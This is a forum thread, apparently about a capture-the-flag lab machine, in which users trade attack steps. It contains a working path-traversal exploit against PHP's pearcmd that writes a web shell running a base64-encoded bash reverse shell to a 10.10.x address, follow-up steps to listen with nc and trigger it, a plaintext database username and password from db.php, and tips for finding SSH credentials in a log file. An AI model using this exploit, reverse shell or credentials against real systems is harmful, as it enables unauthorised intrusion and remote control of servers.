Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 04, 2024, 06:08 AM)b2synapse Wrote: (Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way
/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php
Just replace the base64 paylaod with your reverse shell base64 encoded
Where can i find the tmp/hello.php?
GET /index.php/?page=../../../../../../../../tmp/hello
Posts: 12
Threads: 0
Joined: Jun 2024
db.php has this:
$dsn = "mysql:host=db;dbname=resourcecenter;";
$dbusername = "jj";
$dbpassword = "ugEG5rR5SG8uPd";
Posts: 52
Threads: 1
Joined: Jul 2024
(Aug 04, 2024, 06:14 AM)glock05 Wrote: (Aug 04, 2024, 06:08 AM)b2synapse Wrote: (Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way
/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php
Just replace the base64 paylaod with your reverse shell base64 encoded
Where can i find the tmp/hello.php?
help mine shell isn't rolled back
GET /index.php/?page=../../../../../../../../tmp/hello
Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 04, 2024, 06:28 AM)Lucifer097 Wrote: (Aug 04, 2024, 06:14 AM)glock05 Wrote: (Aug 04, 2024, 06:08 AM)b2synapse Wrote: (Aug 04, 2024, 05:41 AM)glock05 Wrote: You can also do it this way
/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTg0LzQ0NDQgMD4mMSc="));?>+/tmp/hello.php
Just replace the base64 paylaod with your reverse shell base64 encoded
Where can i find the tmp/hello.php?
help mine shell isn't rolled back
GET /index.php/?page=../../../../../../../../tmp/hello
listen with nc
visit /index.php/?page=../../../../../../../../tmp/hello
Posts: 52
Threads: 1
Joined: Jul 2024
thanks @ glock05 it worked just some texts worng i have ut so thats why
Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 04, 2024, 06:36 AM)Lucifer097 Wrote: thanks @glock05 it worked just some texts worng i have ut so thats why
That's awesome glad it helped 
Posts: 9
Threads: 0
Joined: Jun 2024
(Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's a log file with creds.
how did you see?
Posts: 124
Threads: 1
Joined: Apr 2024
(Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's a log file with creds.
Damm i looked to that file, how did you noticed creds?
Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 04, 2024, 06:44 AM)jsvensson Wrote: (Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's a log file with creds.
Damm i looked to that file, how did you noticed creds?
search for "pass"
Posts: 219
Threads: 14
Joined: Apr 2024
(Aug 04, 2024, 06:46 AM)glock05 Wrote: (Aug 04, 2024, 06:44 AM)jsvensson Wrote: (Aug 04, 2024, 06:37 AM)bestmajor Wrote: Found SSH-Login for msainristil. Just download the zip-file "c2f4813249...snip....zip". There is no ticket within the database, i.e. you could overlook it. It's a log file with creds.
Damm i looked to that file, how did you noticed creds?
search for "pass"
How did u figured out that vulnerability ../../shell ? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason:
Asking for rep is not allowed
|
